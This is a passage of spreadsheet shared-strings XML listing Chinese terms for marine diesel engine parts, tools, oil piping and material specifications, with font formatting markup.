        <charset val="134"/>
      </rPr>
      <t>主起动阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承生产厂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MAN B&amp;W </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双臂吊车</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>心轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动高压泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动吊</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承标志</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮标志</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料和加工说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材质和检验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材质和实验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套材料质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料和试验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料转换表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试验说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材质规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套磨损测量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套磨损侧重点</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>措施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量锥</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量连接块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量点</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量存根</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械控制机构工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属软管接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低硫油冷却系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器铣刀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀铣刀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铣磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机安装空间</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种图表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>莫式圆锥</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴链轮安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器的安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函弹簧安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和调整说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装卡环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装导轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多芯电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多芯插头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆头旋钮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机标牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>窄面法兰工字钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>针嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>针阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防咬剂（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>NS-160)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防咬剂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>渗碳氮化规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用轴承座</t>
    </r>
  </si>
  <si>
    <r>
      <t>NOVO-TECH</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加紧手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀体包含针阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板牙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡油盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下半挡油盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上半挡油盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄漏油收集罐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油料加入器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油漏斗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡油罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油进油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄漏油监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄漏油回油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承油管驱动端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元排放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器进油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三段式刮油环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油滤网</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油圈下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抛油环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾监测器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾探测器清洗包</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
